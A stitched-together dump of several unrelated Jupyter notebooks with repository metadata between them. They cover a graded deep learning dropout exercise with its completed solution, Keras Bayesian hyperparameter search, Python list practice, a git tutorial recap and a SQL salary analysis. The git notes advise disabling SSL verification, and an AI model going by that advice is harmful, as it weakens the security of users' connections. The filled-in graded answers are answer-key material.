"# GRADED FUNCTION: backward_propagation_with_dropout\n\ndef backward_propagation_with_dropout(X, Y, cache, keep_prob):\n \"\"\"\n Implements the backward propagation of our baseline model to which we added dropout.\n \n Arguments:\n X -- input dataset, of shape (2, number of examples)\n Y -- \"true\" labels vector, of shape (output size, number of examples)\n cache -- cache output from forward_propagation_with_dropout()\n keep_prob - probability of keeping a neuron active during drop-out, scalar\n \n Returns:\n gradients -- A dictionary with the gradients with respect to each parameter, activation and pre-activation variables\n \"\"\"\n \n m = X.shape[1]\n (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3) = cache\n \n dZ3 = A3 - Y\n dW3 = 1./m * np.dot(dZ3, A2.T)\n db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True)\n dA2 = np.dot(W3.T, dZ3)\n ### START CODE HERE ### (≈ 2 lines of code)\n dA2=dA2*D2 # Step 1: Apply mask D2 to shut down the same neurons as during the forward propagation\n dA2=dA2/keep_prob # Step 2: Scale the value of neurons that haven't been shut down\n ### END CODE HERE ###\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = 1./m * np.dot(dZ2, A1.T)\n db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True)\n \n dA1 = np.dot(W2.T, dZ2)\n ### START CODE HERE ### (≈ 2 lines of code)\n dA1=dA1*D1 # Step 1: Apply mask D1 to shut down the same neurons as during the forward propagation\n dA1=dA1/keep_prob # Step 2: Scale the value of neurons that haven't been shut down\n ### END CODE HERE ###\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = 1./m * np.dot(dZ1, X.T)\n db1 = 1./m * np.sum(dZ1, axis=1, keepdims = True)\n \n gradients = {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3,\"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1, \n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n \n return gradients",
"_____no_output_____"
],
[
"X_assess, Y_assess, cache = backward_propagation_with_dropout_test_case()\n\ngradients = backward_propagation_with_dropout(X_assess, Y_assess, cache, keep_prob = 0.8)\n\nprint (\"dA1 = \\n\" + str(gradients[\"dA1\"]))\nprint (\"dA2 = \\n\" + str(gradients[\"dA2\"]))",
"dA1 = \n[[ 0.36544439 0. -0.00188233 0. -0.17408748]\n [ 0.65515713 0. -0.00337459 0. -0. ]]\ndA2 = \n[[ 0.58180856 0. -0.00299679 0. -0.27715731]\n [ 0. 0.53159854 -0. 0.53159854 -0.34089673]\n [ 0. 0. -0.00292733 0. -0. ]]\n"
]
],
[
[
"**Expected Output**: \n\n```\ndA1 = \n[[ 0.36544439 0. -0.00188233 0. -0.17408748]\n [ 0.65515713 0. -0.00337459 0. -0. ]]\ndA2 = \n[[ 0.58180856 0. -0.00299679 0. -0.27715731]\n [ 0. 0.53159854 -0. 0.53159854 -0.34089673]\n [ 0. 0. -0.00292733 0. -0. ]]\n```",
"_____no_output_____"
],
[
"Let's now run the model with dropout (`keep_prob = 0.86`). It means at every iteration you shut down each neurons of layer 1 and 2 with 14% probability. The function `model()` will now call:\n- `forward_propagation_with_dropout` instead of `forward_propagation`.\n- `backward_propagation_with_dropout` instead of `backward_propagation`.",
"_____no_output_____"
]
],
[
[
"parameters = model(train_X, train_Y, keep_prob = 0.86, learning_rate = 0.3)\n\nprint (\"On the train set:\")\npredictions_train = predict(train_X, train_Y, parameters)\nprint (\"On the test set:\")\npredictions_test = predict(test_X, test_Y, parameters)",
"Cost after iteration 0: 0.6543912405149825\n"
]
],
[
[
"Dropout works great! The test accuracy has increased again (to 95%)! Your model is not overfitting the training set and does a great job on the test set. The French football team will be forever grateful to you! \n\nRun the code below to plot the decision boundary.",
"_____no_output_____"
]
],
[
[
"plt.title(\"Model with dropout\")\naxes = plt.gca()\naxes.set_xlim([-0.75,0.40])\naxes.set_ylim([-0.75,0.65])\nplot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_X, train_Y)",
"_____no_output_____"
]
],
[
[
"**Note**:\n- A **common mistake** when using dropout is to use it both in training and testing. You should use dropout (randomly eliminate nodes) only in training. \n- Deep learning frameworks like [tensorflow](https://www.tensorflow.org/api_docs/python/tf/nn/dropout), [PaddlePaddle](http://doc.paddlepaddle.org/release_doc/0.9.0/doc/ui/api/trainer_config_helpers/attrs.html), [keras](https://keras.io/layers/core/#dropout) or [caffe](http://caffe.berkeleyvision.org/tutorial/layers/dropout.html) come with a dropout layer implementation. Don't stress - you will soon learn some of these frameworks.\n\n<font color='blue'>\n**What you should remember about dropout:**\n- Dropout is a regularization technique.\n- You only use dropout during training. Don't use dropout (randomly eliminate nodes) during test time.\n- Apply dropout both during forward and backward propagation.\n- During training time, divide each dropout layer by keep_prob to keep the same expected value for the activations. For example, if keep_prob is 0.5, then we will on average shut down half the nodes, so the output will be scaled by 0.5 since only the remaining half are contributing to the solution. Dividing by 0.5 is equivalent to multiplying by 2. Hence, the output now has the same expected value. You can check that this works even when keep_prob is other values than 0.5. ",
"_____no_output_____"
],
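[
"A quick sanity check of that scaling, stated as an expected value (a small sketch using the notation above): if an activation $a$ is kept with probability $keep\\_prob$ and divided by $keep\\_prob$, and set to $0$ otherwise, then $E[\\tilde{a}] = keep\\_prob \\cdot \\frac{a}{keep\\_prob} + (1 - keep\\_prob) \\cdot 0 = a$, so each activation keeps the same expected value with or without inverted dropout.",
"_____no_output_____"
],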
[
"## 4 - Conclusions",
"_____no_output_____"
],
[
"**Here are the results of our three models**: \n\n<table> \n <tr>\n <td>\n **model**\n </td>\n <td>\n **train accuracy**\n </td>\n <td>\n **test accuracy**\n </td>\n\n </tr>\n <td>\n 3-layer NN without regularization\n </td>\n <td>\n 95%\n </td>\n <td>\n 91.5%\n </td>\n <tr>\n <td>\n 3-layer NN with L2-regularization\n </td>\n <td>\n 94%\n </td>\n <td>\n 93%\n </td>\n </tr>\n <tr>\n <td>\n 3-layer NN with dropout\n </td>\n <td>\n 93%\n </td>\n <td>\n 95%\n </td>\n </tr>\n</table> ",
"_____no_output_____"
],
[
"Note that regularization hurts training set performance! This is because it limits the ability of the network to overfit to the training set. But since it ultimately gives better test accuracy, it is helping your system. ",
"_____no_output_____"
],
[
"Congratulations for finishing this assignment! And also for revolutionizing French football. :-) ",
"_____no_output_____"
],
[
"<font color='blue'>\n**What we want you to remember from this notebook**:\n- Regularization will help you reduce overfitting.\n- Regularization will drive your weights to lower values.\n- L2 regularization and Dropout are two very effective regularization techniques.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb2c429e51648f8b51e6286e0a9e9cf8909f3412 | 14,029 | ipynb | Jupyter Notebook | t81_558_class_08_4_bayesian_hyperparameter_opt.ipynb | RamsteinWR/t81_558_deep_learning | f13a6e795a034272a107347066ff5e04161aa478 | [
"Apache-2.0"
] | 1 | 2020-01-03T21:41:58.000Z | 2020-01-03T21:41:58.000Z | t81_558_class_08_4_bayesian_hyperparameter_opt.ipynb | RamsteinWR/t81_558_deep_learning | f13a6e795a034272a107347066ff5e04161aa478 | [
"Apache-2.0"
] | null | null | null | t81_558_class_08_4_bayesian_hyperparameter_opt.ipynb | RamsteinWR/t81_558_deep_learning | f13a6e795a034272a107347066ff5e04161aa478 | [
"Apache-2.0"
] | null | null | null | 37.61126 | 273 | 0.574595 | [
[
[
"<a href=\"https://colab.research.google.com/github/jeffheaton/t81_558_deep_learning/blob/master/t81_558_class_08_4_bayesian_hyperparameter_opt.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"# T81-558: Applications of Deep Neural Networks\n**Module 8: Kaggle Data Sets**\n* Instructor: [Jeff Heaton](https://sites.wustl.edu/jeffheaton/), McKelvey School of Engineering, [Washington University in St. Louis](https://engineering.wustl.edu/Programs/Pages/default.aspx)\n* For more information visit the [class website](https://sites.wustl.edu/jeffheaton/t81-558/).",
"_____no_output_____"
],
[
"# Module 8 Material\n\n* Part 8.1: Introduction to Kaggle [[Video]](https://www.youtube.com/watch?v=v4lJBhdCuCU&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_1_kaggle_intro.ipynb)\n* Part 8.2: Building Ensembles with Scikit-Learn and Keras [[Video]](https://www.youtube.com/watch?v=LQ-9ZRBLasw&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_2_keras_ensembles.ipynb)\n* Part 8.3: How Should you Architect Your Keras Neural Network: Hyperparameters [[Video]](https://www.youtube.com/watch?v=1q9klwSoUQw&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_3_keras_hyperparameters.ipynb)\n* **Part 8.4: Bayesian Hyperparameter Optimization for Keras** [[Video]](https://www.youtube.com/watch?v=sXdxyUCCm8s&list=PLjy4p-07OYzulelvJ5KVaT2pDlxivl_BN) [[Notebook]](t81_558_class_08_4_bayesian_hyperparameter_opt.ipynb)\n* Part 8.5: Current Semester's Kaggle [[Video]](https://www.youtube.com/watch?v=48OrNYYey5E) [[Notebook]](t81_558_class_08_5_kaggle_project.ipynb)\n",
"_____no_output_____"
],
[
"# Google CoLab Instructions\n\nThe following code ensures that Google CoLab is running the correct version of TensorFlow.",
"_____no_output_____"
]
],
[
[
"# Startup Google CoLab\ntry:\n %tensorflow_version 2.x\n COLAB = True\n print(\"Note: using Google CoLab\")\nexcept:\n print(\"Note: not using Google CoLab\")\n COLAB = False\n\n# Nicely formatted time string\ndef hms_string(sec_elapsed):\n h = int(sec_elapsed / (60 * 60))\n m = int((sec_elapsed % (60 * 60)) / 60)\n s = sec_elapsed % 60\n return \"{}:{:>02}:{:>05.2f}\".format(h, m, s)",
"Note: not using Google CoLab\n"
]
],
[
[
"# Part 8.4: Bayesian Hyperparameter Optimization for Keras\n\nSnoek, J., Larochelle, H., & Adams, R. P. (2012). [Practical bayesian optimization of machine learning algorithms](https://arxiv.org/pdf/1206.2944.pdf). In *Advances in neural information processing systems* (pp. 2951-2959).\n\n\n* [bayesian-optimization](https://github.com/fmfn/BayesianOptimization)\n* [hyperopt](https://github.com/hyperopt/hyperopt)\n* [spearmint](https://github.com/JasperSnoek/spearmint)",
"_____no_output_____"
]
],
[
[
"# Ignore useless W0819 warnings generated by TensorFlow 2.0. Hopefully can remove this ignore in the future.\n# See https://github.com/tensorflow/tensorflow/issues/31308\nimport logging, os\nlogging.disable(logging.WARNING)\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\nimport pandas as pd\nfrom scipy.stats import zscore\n\n# Read the data set\ndf = pd.read_csv(\n \"https://data.heatonresearch.com/data/t81-558/jh-simple-dataset.csv\",\n na_values=['NA','?'])\n\n# Generate dummies for job\ndf = pd.concat([df,pd.get_dummies(df['job'],prefix=\"job\")],axis=1)\ndf.drop('job', axis=1, inplace=True)\n\n# Generate dummies for area\ndf = pd.concat([df,pd.get_dummies(df['area'],prefix=\"area\")],axis=1)\ndf.drop('area', axis=1, inplace=True)\n\n# Missing values for income\nmed = df['income'].median()\ndf['income'] = df['income'].fillna(med)\n\n# Standardize ranges\ndf['income'] = zscore(df['income'])\ndf['aspect'] = zscore(df['aspect'])\ndf['save_rate'] = zscore(df['save_rate'])\ndf['age'] = zscore(df['age'])\ndf['subscriptions'] = zscore(df['subscriptions'])\n\n# Convert to numpy - Classification\nx_columns = df.columns.drop('product').drop('id')\nx = df[x_columns].values\ndummies = pd.get_dummies(df['product']) # Classification\nproducts = dummies.columns\ny = dummies.values",
"_____no_output_____"
],
[
"import pandas as pd\nimport os\nimport numpy as np\nimport time\nimport tensorflow.keras.initializers\nimport statistics\nimport tensorflow.keras\nfrom sklearn import metrics\nfrom sklearn.model_selection import StratifiedKFold\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Activation, Dropout, InputLayer\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom tensorflow.keras.layers import LeakyReLU,PReLU\nfrom tensorflow.keras.optimizers import Adam\n\ndef generate_model(dropout, neuronPct, neuronShrink):\n # We start with some percent of 5000 starting neurons on the first hidden layer.\n neuronCount = int(neuronPct * 5000)\n \n # Construct neural network\n # kernel_initializer = tensorflow.keras.initializers.he_uniform(seed=None)\n model = Sequential()\n\n # So long as there would have been at least 25 neurons and fewer than 10\n # layers, create a new layer.\n layer = 0\n while neuronCount>25 and layer<10:\n # The first (0th) layer needs an input input_dim(neuronCount)\n if layer==0:\n model.add(Dense(neuronCount, \n input_dim=x.shape[1], \n activation=PReLU()))\n else:\n model.add(Dense(neuronCount, activation=PReLU())) \n layer += 1\n\n # Add dropout after each hidden layer\n model.add(Dropout(dropout))\n\n # Shrink neuron count for each layer\n neuronCount = neuronCount * neuronShrink\n\n model.add(Dense(y.shape[1],activation='softmax')) # Output\n return model",
"_____no_output_____"
],
[
"# Generate a model and see what the resulting structure looks like.\nmodel = generate_model(dropout=0.2, neuronPct=0.1, neuronShrink=0.25)\nmodel.summary()",
"Model: \"sequential\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\ndense (Dense) (None, 500) 24500 \n_________________________________________________________________\ndropout (Dropout) (None, 500) 0 \n_________________________________________________________________\ndense_1 (Dense) (None, 125) 62750 \n_________________________________________________________________\ndropout_1 (Dropout) (None, 125) 0 \n_________________________________________________________________\ndense_2 (Dense) (None, 31) 3937 \n_________________________________________________________________\ndropout_2 (Dropout) (None, 31) 0 \n_________________________________________________________________\ndense_3 (Dense) (None, 7) 224 \n=================================================================\nTotal params: 91,411\nTrainable params: 91,411\nNon-trainable params: 0\n_________________________________________________________________\n"
],
[
"def evaluate_network(dropout,lr,neuronPct,neuronShrink):\n SPLITS = 2\n\n # Bootstrap\n boot = StratifiedShuffleSplit(n_splits=SPLITS, test_size=0.1)\n\n # Track progress\n mean_benchmark = []\n epochs_needed = []\n num = 0\n \n\n # Loop through samples\n for train, test in boot.split(x,df['product']):\n start_time = time.time()\n num+=1\n\n # Split train and test\n x_train = x[train]\n y_train = y[train]\n x_test = x[test]\n y_test = y[test]\n\n model = generate_model(dropout, neuronPct, neuronShrink)\n model.compile(loss='categorical_crossentropy', optimizer=Adam(lr=lr))\n monitor = EarlyStopping(monitor='val_loss', min_delta=1e-3, \n patience=100, verbose=0, mode='auto', restore_best_weights=True)\n\n # Train on the bootstrap sample\n model.fit(x_train,y_train,validation_data=(x_test,y_test),callbacks=[monitor],verbose=0,epochs=1000)\n epochs = monitor.stopped_epoch\n epochs_needed.append(epochs)\n\n # Predict on the out of boot (validation)\n pred = model.predict(x_test)\n\n # Measure this bootstrap's log loss\n y_compare = np.argmax(y_test,axis=1) # For log loss calculation\n score = metrics.log_loss(y_compare, pred)\n mean_benchmark.append(score)\n m1 = statistics.mean(mean_benchmark)\n m2 = statistics.mean(epochs_needed)\n mdev = statistics.pstdev(mean_benchmark)\n\n # Record this iteration\n time_took = time.time() - start_time\n #print(f\"#{num}: score={score:.6f}, mean score={m1:.6f}, stdev={mdev:.6f}, epochs={epochs}, mean epochs={int(m2)}, time={hms_string(time_took)}\")\n\n tensorflow.keras.backend.clear_session()\n return (-m1)\n\nprint(evaluate_network(\n dropout=0.2,\n lr=1e-3,\n neuronPct=0.2,\n neuronShrink=0.2))\n",
"-0.6845843913475982\n"
],
[
"from bayes_opt import BayesianOptimization\nimport time\n\n# Supress NaN warnings, see: https://stackoverflow.com/questions/34955158/what-might-be-the-cause-of-invalid-value-encountered-in-less-equal-in-numpy\nimport warnings\nwarnings.filterwarnings(\"ignore\",category =RuntimeWarning)\n\n# Bounded region of parameter space\npbounds = {'dropout': (0.0, 0.499),\n 'lr': (0.0, 0.1),\n 'neuronPct': (0.01, 1),\n 'neuronShrink': (0.01, 1)\n }\n\noptimizer = BayesianOptimization(\n f=evaluate_network,\n pbounds=pbounds,\n verbose=2, # verbose = 1 prints only when a maximum is observed, verbose = 0 is silent\n random_state=1,\n)\n\nstart_time = time.time()\noptimizer.maximize(init_points=10, n_iter=100,)\ntime_took = time.time() - start_time\n\nprint(f\"Total runtime: {hms_string(time_took)}\")\nprint(optimizer.max)",
"_____no_output_____"
]
],
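[
[
"(Added sketch, not part of the original notebook.) One way to use the search result: `optimizer.max['params']` holds the best hyperparameters found above, so the network can be rebuilt with them and retrained on the full data. The snippet assumes `generate_model`, `Adam` and the training data from the cells above.",
"_____no_output_____"
]
],
[
[
"# Rebuild the best network found by the Bayesian optimizer (added sketch).\nbest = optimizer.max['params']\nfinal_model = generate_model(dropout=best['dropout'], neuronPct=best['neuronPct'], neuronShrink=best['neuronShrink'])\nfinal_model.compile(loss='categorical_crossentropy', optimizer=Adam(lr=best['lr']))",
"_____no_output_____"
]
],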
[
[
"{'target': -0.6500334282952827, 'params': {'dropout': 0.12771198428037775, 'lr': 0.0074010841641111965, 'neuronPct': 0.10774655638231533, 'neuronShrink': 0.2784788676498257}}",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb2c48376c488dc99423b32e289850df809850cb | 7,901 | ipynb | Jupyter Notebook | content/notebooks/2015-12-11-meeting-summary.ipynb | ueapy/ueapy.github.io | 920f25f4189512a77aa6b79eae133db0f14e514a | [
"MIT"
] | 2 | 2016-02-02T06:15:38.000Z | 2016-11-28T10:31:43.000Z | content/notebooks/2015-12-11-meeting-summary.ipynb | ueapy/ueapy.github.io | 920f25f4189512a77aa6b79eae133db0f14e514a | [
"MIT"
] | null | null | null | content/notebooks/2015-12-11-meeting-summary.ipynb | ueapy/ueapy.github.io | 920f25f4189512a77aa6b79eae133db0f14e514a | [
"MIT"
] | 3 | 2016-01-22T11:27:08.000Z | 2018-02-09T16:20:57.000Z | 19.508642 | 234 | 0.529806 | [
[
[
"name = '2015-12-11-meeting-summary'\ntitle = 'Introducing Git'\ntags = 'git, github, version control'\nauthor = 'Denis Sergeev'",
"_____no_output_____"
],
[
"from nb_tools import connect_notebook_to_post\nfrom IPython.core.display import HTML\n\nhtml = connect_notebook_to_post(name, title, tags, author)",
"_____no_output_____"
]
],
[
[
"Today we talked about git and its functionality for managing code, text documents and other building blocks of our research.",
"_____no_output_____"
],
[
"We followed a very good tutorial created by [**Software Carpentry**](http://swcarpentry.github.io/git-novice/). There are hundreds of other resources available online, for example, [**Git Real**](http://gitreal.codeschool.com/).",
"_____no_output_____"
],
[
"Hence, this post is not trying to be yet another git tutorial. Instead, below is just a brief recap of what commands were covered during the meeting.",
"_____no_output_____"
],
[
"## Setting Up Git",
"_____no_output_____"
],
[
"Set up your name and email so that each time you contribute to a project your commit has an author",
"_____no_output_____"
],
[
"`git config --global user.name \"Python UEA\"`",
"_____no_output_____"
],
[
"`git config --global user.email \"[email protected]\"`",
"_____no_output_____"
],
[
"## Creating a Repository",
"_____no_output_____"
],
[
"Create a new directory for a project",
"_____no_output_____"
],
[
"`mkdir myproject`",
"_____no_output_____"
],
[
"Go into the newly created directory",
"_____no_output_____"
],
[
"`cd myproject`",
"_____no_output_____"
],
[
"Make the directory a Git repository",
"_____no_output_____"
],
[
"`git init`",
"_____no_output_____"
],
[
"Check status of the repository",
"_____no_output_____"
],
[
"`git status`",
"_____no_output_____"
],
[
"## Tracking Changes",
"_____no_output_____"
],
[
"Add a Python script to the repo (make the file staged for commit)",
"_____no_output_____"
],
[
"`git add awesome_script.py`",
"_____no_output_____"
],
[
"Commit changes with a meaningful message",
"_____no_output_____"
],
[
"`git commit -m \"Add awesome script written in Python\"`",
"_____no_output_____"
],
[
"## Exploring History",
"_____no_output_____"
],
[
"### Commits history",
"_____no_output_____"
],
[
"`git log`",
"_____no_output_____"
],
[
"### Comparing different versions of files",
"_____no_output_____"
],
[
"List all untracked changes in the repository",
"_____no_output_____"
],
[
"`git diff`",
"_____no_output_____"
],
[
"Differences with “head minus one”, i.e. previous, commit",
"_____no_output_____"
],
[
"`git diff HEAD~1 awesome_script.py`",
"_____no_output_____"
],
[
"Differences with a specific commit",
"_____no_output_____"
],
[
"`git diff <unique commit id> awesome_script.py`",
"_____no_output_____"
],
[
"## Ignoring Things",
"_____no_output_____"
],
[
"Create a .gitignore file and put '*.pyc' line in it telling git will to ignore all Python bytecode files",
"_____no_output_____"
],
[
"`echo '*.pyc' >> .gitignore`",
"_____no_output_____"
],
[
"Include .gitignore in the repository",
"_____no_output_____"
],
[
"`git add .gitignore`",
"_____no_output_____"
],
[
"`git commit -m \"Add .gitignore file\"`",
"_____no_output_____"
],
[
"`git status`",
"_____no_output_____"
],
[
"## Remotes in GitHub",
"_____no_output_____"
],
[
"`git remote add origin [email protected]:<username>/<repository_name>.git`",
"_____no_output_____"
],
[
"`git push -u origin master`",
"_____no_output_____"
],
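[
"(Added note.) To confirm the remote was registered correctly, you can list the configured remotes with `git remote -v` before pushing.",
"_____no_output_____"
],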
[
"### Issue on Grace",
"_____no_output_____"
],
[
"If you use git on [Grace](http://rscs.uea.ac.uk/high-performance-computing) and have tried `git push` to a GitHub repository, you have probably encountered the following error:",
"_____no_output_____"
],
[
"`fatal: unable to access 'https://github.com/***/***/': error:0D0C50A1:asn1 encoding routines:ASN1_item_verify:unknown message digest algorithm`",
"_____no_output_____"
],
[
"One of the possible solutions here is to switch off SSL verification by adding the following line in your .bashrc file:",
"_____no_output_____"
],
[
"`export GIT_SSL_NO_VERIFY=true`",
"_____no_output_____"
]
],
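[
[
"(Added note.) Disabling SSL verification is a workaround rather than a fix; where possible, a safer option is to point git at a valid CA bundle instead, e.g. `git config --global http.sslCAInfo /path/to/ca-bundle.crt`.",
"_____no_output_____"
]
],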
[
[
"HTML(html)",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
]
] |
cb2c4d82b1ad27a5059802798e689872e2eb0f4d | 9,584 | ipynb | Jupyter Notebook | Lists/Arrays_data_Structure.ipynb | pdx97/Python_Data_Structures_and_Algorithms_Implementations | 898af6dce4fb5882145b1c2ce3f2d19e36a27bce | [
"MIT"
] | 2 | 2021-05-10T10:32:55.000Z | 2021-05-11T10:18:11.000Z | Lists/Arrays_data_Structure.ipynb | pdx97/Python_Data_Structures_and_Algorithms_Implementations | 898af6dce4fb5882145b1c2ce3f2d19e36a27bce | [
"MIT"
] | null | null | null | Lists/Arrays_data_Structure.ipynb | pdx97/Python_Data_Structures_and_Algorithms_Implementations | 898af6dce4fb5882145b1c2ce3f2d19e36a27bce | [
"MIT"
] | null | null | null | 17.206463 | 88 | 0.444908 | [
[
[
"Expenses = {\"jan\":2200,\"feb\":2350,\"mar\":2600,\"Apr\":2130,\"May\":2190}",
"_____no_output_____"
],
[
"diff = Expenses[\"feb\"] - Expenses[\"jan\"]",
"_____no_output_____"
],
[
"diff\n",
"_____no_output_____"
],
[
"Values = Expenses.values()\nList_Values = list(Values)",
"_____no_output_____"
],
[
"List_Values",
"_____no_output_____"
],
[
"sum = 0\nfor i in range(3):\n sum = sum + List_Values[i]\n \nprint(sum)\n ",
"7150\n"
],
[
"for i in Expenses.values():\n if(Expenses.values()==2000):\n print(\"Yes\")\n else:\n print(\"No\")",
"No\nNo\nNo\nNo\nNo\n"
],
[
"Expenses['June'] = 1980 # adding new key value to the dictionary",
"_____no_output_____"
],
[
"Expenses",
"_____no_output_____"
],
[
"Refund = Expenses['Apr'] - 200",
"_____no_output_____"
],
[
"Refund ",
"_____no_output_____"
],
[
"Expenses['Apr'] = Refund ",
"_____no_output_____"
],
[
"Expenses['Apr']\n",
"_____no_output_____"
],
[
"Expenses",
"_____no_output_____"
],
[
"heros=['spider man','thor','hulk','iron man','captain america']",
"_____no_output_____"
],
[
"len(heros) # lenght of the list",
"_____no_output_____"
],
[
"heros.append('black panther')",
"_____no_output_____"
],
[
"heros",
"_____no_output_____"
],
[
"heros.insert(3,'black panther')",
"_____no_output_____"
],
[
"heros",
"_____no_output_____"
],
[
"heros.pop(3)",
"_____no_output_____"
],
[
"heros",
"_____no_output_____"
],
[
"heros.insert(1,'iron man')",
"_____no_output_____"
],
[
"heros",
"_____no_output_____"
],
[
"del heros[1:3]",
"_____no_output_____"
],
[
"heros",
"_____no_output_____"
],
[
"heros.pop(1)",
"_____no_output_____"
],
[
"heros",
"_____no_output_____"
],
[
"heros.insert(1,'doctor strange')",
"_____no_output_____"
],
[
"heros",
"_____no_output_____"
],
[
"sorted_heros = sorted(heros)",
"_____no_output_____"
],
[
"sorted_heros",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2c64c94cbaec40ca62c5b091e4af5b6de6dad4 | 43,033 | ipynb | Jupyter Notebook | EmployeeSQL/SqlChallene.ipynb | thenry390/sql-challenge | 6fc1159c39936594265b01f462812f32cb8488af | [
"ADSL"
] | null | null | null | EmployeeSQL/SqlChallene.ipynb | thenry390/sql-challenge | 6fc1159c39936594265b01f462812f32cb8488af | [
"ADSL"
] | null | null | null | EmployeeSQL/SqlChallene.ipynb | thenry390/sql-challenge | 6fc1159c39936594265b01f462812f32cb8488af | [
"ADSL"
] | null | null | null | 91.559574 | 21,640 | 0.811563 | [
[
[
"# Observations\n1. It appears the salaries are very high on the high end and very low at the low end.\n2. Mimics the business model of a franchise restaurant where most of the lower end employees make minimum wage.",
"_____no_output_____"
]
],
[
[
"from sqlalchemy import create_engine, Table, Column, MetaData, Integer, Computed\nfrom random import randint\nimport os\nfrom dotenv import load_dotenv\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import colors\nfrom matplotlib.ticker import PercentFormatter\nimport scipy.stats as sts\n\n# dialect+driver = 'postgres' for us, host probably = 'localhost' (for now), username defaults to 'postgres'",
"_____no_output_____"
],
[
"load_dotenv()\nusername=os.environ.get('DB_USERNAME')\npassword=os.environ.get('DB_PASSWORD')\n\nconnection_string= f'postgresql+psycopg2://{username}:{password}@localhost:5432/EmployeeDB'",
"_____no_output_____"
],
[
"def doQuery(query): # READ\n return connection.execute(query).fetchall()\ndef doUpdate(updateQuery): # CREATE, UPDATE, DELETE\n connection.execute(updateQuery)",
"_____no_output_____"
],
[
"connection = create_engine(connection_string).connect()\n\nquery = \"select e.emp_no, e.emp_title_id, e.birthdate, e.first_name, e.last_name, e.sex, e.hire_date, t.title, s.salary \\\nfrom employee e, salary s, title t \\\nwhere e.emp_no = s.emp_no and \\\ne.emp_title_id = t.title_id\"\n\nqueryResults = doQuery(query)\nqueryResults_df = pd.DataFrame(queryResults)\n\nconnection.close()\nqueryResults_df = queryResults_df.rename(columns={0:'Emp Number', 1:'Title ID', 2:'Birth Date',3:'First Name',4:'Last Name',5:'Gender',6:'Hire Date',7:'Title',8:'Salary'})\nqueryResults_df.head()",
"_____no_output_____"
]
],
[
[
"Create a histogram to visualize the most common salary ranges for employees.",
"_____no_output_____"
]
],
[
[
"salary=queryResults_df[\"Salary\"]\nplt.hist(salary)\nplt.show()\nplt.savefig(\"./Data Analysis/Images/SalaryHistogram.png\")\nprint(sts.normaltest(salary.sample(50)))",
"_____no_output_____"
],
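[
"# (Added sketch, not part of the original notebook.)\n# A skewness statistic quantifies the long right tail visible in the histogram above.\nprint('Skewness:', sts.skew(salary))",
"_____no_output_____"
],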
[
"# Demonstrate calculating measures of central tendency\nmean_numpy = np.mean(salary)\nprint(f\"The mean salary is {mean_numpy}\")\n\nmedian_numpy = np.median(salary)\nprint(f\"The median salary is {median_numpy}\")\n\nmode_scipy = sts.mode(salary)\nprint(f\"The mode salary is {mode_scipy}\")",
"_____no_output_____"
]
],
[
[
"Create a bar chart of average salary by title.",
"_____no_output_____"
]
],
[
[
